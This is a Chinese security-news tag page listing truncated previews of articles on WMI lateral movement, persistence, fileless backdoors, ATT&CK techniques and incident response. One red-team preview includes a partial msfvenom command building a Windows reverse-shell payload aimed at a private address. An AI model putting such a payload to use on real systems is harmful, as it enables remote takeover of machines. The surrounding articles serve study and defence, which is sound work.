wmi - 第 3 | CN-SEC 中文网

安全文章

应对隐秘的 WMI 横向移动

介绍在本文中，我们将介绍一个使用 Windows 管理规范 (WMI) 远程控制目标计算机的 Python 脚本。该脚本利用 COM 与 WMI 基础架构进行通信并执行管理任务。使用不同的类，我们将探...

06月26日31 views评论

阅读全文

安全文章

工作组权限维持

免责声明本文所涉及的任何技术、信息或工具，仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与...

06月11日18 views评论

阅读全文

安全文章

红队战术 - WMI + MSI 横向移动

执行在 MSI（Microsoft 安装程序包）中生成恶意负载：攻击者@localmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LP...

04月19日11 views评论

阅读全文

ATT&CK -

Windows 管理规范事件订阅可以使用 Windows 管理规范（WMI）安装在发生定义事件时执行代码的事件过滤器，提供程序，使用程序和绑定程序。攻击者可以使用 WMI 的功能来订阅事件并在事件...

04月15日ATTACK20 views评论

阅读全文

ATT&CK -

Windows 管理规范 Windows 管理规范 (WMI) 是 Windows 管理的一个功能，它为本地和远程访问 Windows 系统组件提供了统一的环境。它依赖于本地和远程访问的 WMI 服务...

04月15日ATTACK15 views评论

阅读全文

wmi一些操作

使用wmic识别安装到系统中的补丁情况 1C:\> wmic qfe get description,installedOn 外部调用获取补丁情况 12select * from Win32_Q...

04月04日安全博客4 views评论

阅读全文

内网渗透|基于WMI的横向移动

基于WMI的横向移动 WMI 介绍WMI 的全称是 Windows Management Instrumentation，它出现在所有的 Windows操作系统中，并由一组强大的工具集合组成，用于管理...

04月03日安全博客45 views评论

阅读全文

安全文章

远程执行windows命令的几种姿势

介绍几种常用的远程执行windows命令的方法，这样可以避免直接使用RDP远程桌面。知识有限可能列的不全或者有错误的地方，欢迎指正。目录：0x01，IPC方式｜445端口｜无回显0x02，PsExec...

03月20日62 views评论

阅读全文

安全工具

Python 查CPU、GPU温度

Windows 下有很多软件可以查看电脑硬件温度，开源的有 Open Hardware Monitor Github 项目地址为：https://github.com/o...

02月29日39 views评论

阅读全文

安全文章

内网渗透之横向移动基础总结（一）

这篇文章介绍内网渗透种的横向移动。在内网渗透中，当攻击者获取到内网某台机器的控制权后，会以被攻陷的主机为跳板，通过收集域内凭证等各种方法，访问域内其他机器，进一步扩大资产范围。通过此类手段，攻击者最...

02月15日88 views评论

阅读全文

安全文章

【权限维持技术】Windows: WMI无文件后门（四）—— 信息收集与反病毒检测

免责声明本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。PowerShell交互PowerShell作为一...

02月14日45 views评论

阅读全文

应急响应

Windows数字取证和应急响应手册

01前言分享一个Windows数字取证和应急响应的手册，里面介绍的技术和工具都是经过实战检验过的。部分内容如下，因为文档比较大，有需要的可以通过下面的网盘链接进行下载。目录如下：1. 事件响应流程.....

02月04日65 views评论

阅读全文

应对隐秘的 WMI 横向移动

工作组权限维持

红队战术 - WMI + MSI 横向移动

ATT&CK -

ATT&CK -

wmi一些操作

内网渗透|基于WMI的横向移动

远程执行windows命令的几种姿势

Python 查CPU、GPU温度

内网渗透之横向移动基础总结（一）

【权限维持技术】Windows: WMI无文件后门（四）—— 信息收集与反病毒检测

Windows数字取证和应急响应手册

在线咨询

微信